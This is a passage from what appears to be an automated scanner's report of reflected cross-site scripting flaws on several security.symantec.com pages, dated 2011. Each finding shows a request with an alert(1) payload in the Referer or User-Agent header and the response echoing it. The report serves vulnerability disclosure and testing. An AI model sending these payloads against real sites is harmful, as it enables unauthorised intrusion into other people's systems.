<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a69f8<script>alert(1)</script>6baef5bbea5</i>
...[SNIP]...
4.226. http://security.symantec.com/sscv6/help.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/help.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 638d3'-alert(1)-'fbef2f3541b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/help.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=638d3'-alert(1)-'fbef2f3541b

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 84148
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:12 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
ry = "unknown_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: help';

   var strReferrer = 'http://www.google.com/search?hl=en&q=638d3'-alert(1)-'fbef2f3541b';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...
4.227. http://security.symantec.com/sscv6/help.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/help.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 49f34<script>alert(1)</script>df5350d6615 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/help.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: 49f34<script>alert(1)</script>df5350d6615
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11480
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:09 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>49f34<script>alert(1)</script>df5350d6615</i>
...[SNIP]...
4.228. http://security.symantec.com/sscv6/home.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/home.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14a0e'-alert(1)-'2a5e8bc09c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/home.asp?langid=ie&venid=sym&close_parent=true&bhcp=1 HTTP/1.1
Host: security.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=14a0e'-alert(1)-'2a5e8bc09c0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_cc=true; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhCookieSaveSess=1; bhCookieSess=1; bhResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:01:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 17283
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:00:21 GMT
Cache-control: private


<html>
<head>
<title>Free Antivirus Protection - Free Anti-virus Software</title>
<meta name="description" content="Test your computer's exposure to online security threats with free antivirus p
...[SNIP]...
ry = "unknown_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: home';

   var strReferrer = 'http://www.google.com/search?hl=en&q=14a0e'-alert(1)-'2a5e8bc09c0';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...
4.229. http://security.symantec.com/sscv6/home.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/home.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6242'-alert(1)-'a5b2f047f13 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/home.asp?langid=ie&venid=sym&plfid=21&pkj=IZLQLSIVFWMFKPXKBQW HTTP/1.1
Host: security.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e6242'-alert(1)-'a5b2f047f13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_cc=true; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhCookieSaveSess=1; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:00:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 16933
Content-Type: text/html
Expires: Sun, 17 Apr 2011 12:59:50 GMT
Cache-control: private


<html>
<head>
<title>Free Antivirus Protection - Free Anti-virus Software</title>
<meta name="description" content="Test your computer's exposure to online security threats with free antivirus p
...[SNIP]...
ry = "unknown_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: home';

   var strReferrer = 'http://www.google.com/search?hl=en&q=e6242'-alert(1)-'a5b2f047f13';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...
4.230. http://security.symantec.com/sscv6/home.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/home.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 1f865<script>alert(1)</script>2502dcb34dd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/home.asp?langid=ie&venid=sym&plfid=21&pkj=IZLQLSIVFWMFKPXKBQW HTTP/1.1
Host: security.symantec.com
Proxy-Connection: keep-alive
Referer: http://security.symantec.com/sscv6/home.asp?langid=ie&venid=sym&close_parent=true
User-Agent: 1f865<script>alert(1)</script>2502dcb34dd
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_cc=true; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhCookieSaveSess=1; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11589
Content-Type: text/html
Expires: Sun, 17 Apr 2011 12:59:48 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>1f865<script>alert(1)</script>2502dcb34dd</i>
...[SNIP]...
4.231. http://security.symantec.com/sscv6/sc_about.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/sc_about.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da49e'-alert(1)-'1b388834f80 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/sc_about.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=da49e'-alert(1)-'1b388834f80

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 13911
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:12 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
untry";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: security scan: about';

   var strReferrer = 'http://www.google.com/search?hl=en&q=da49e'-alert(1)-'1b388834f80';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...
4.232. http://security.symantec.com/sscv6/sc_about.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/sc_about.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 636d7<script>alert(1)</script>7ca210fd618 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/sc_about.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: 636d7<script>alert(1)</script>7ca210fd618
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11484
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:09 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>636d7<script>alert(1)</script>7ca210fd618</i>
...[SNIP]...
4.233. http://security.symantec.com/sscv6/security_solutions.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/security_solutions.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e4ff'-alert(1)-'13a46783dc4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/security_solutions.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=3e4ff'-alert(1)-'13a46783dc4

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 18500
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:09 GMT
Cache-control: private

<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security C
...[SNIP]...
country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: security solutions';

   var strReferrer = 'http://www.google.com/search?hl=en&q=3e4ff'-alert(1)-'13a46783dc4';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...
4.234. http://security.symantec.com/sscv6/security_solutions.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/security_solutions.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 39bf5<script>alert(1)</script>f090c2990df was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/security_solutions.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: 39bf5<script>alert(1)</script>f090c2990df
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11494
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:06 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>39bf5<script>alert(1)</script>f090c2990df</i>
...[SNIP]...
4.235. http://security.symantec.com/sscv6/ssc_EULA.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/ssc_EULA.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a180'-alert(1)-'bafe39e602 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/ssc_EULA.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=6a180'-alert(1)-'bafe39e602

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 21284
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:11 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Securi
...[SNIP]...
;

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: end user license agreement';

   var strReferrer = 'http://www.google.com/search?hl=en&q=6a180'-alert(1)-'bafe39e602';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...
4.236. http://security.symantec.com/sscv6/ssc_EULA.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/ssc_EULA.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a6601<script>alert(1)</script>44de2872daa was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/ssc_EULA.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: a6601<script>alert(1)</script>44de2872daa
Connection: close
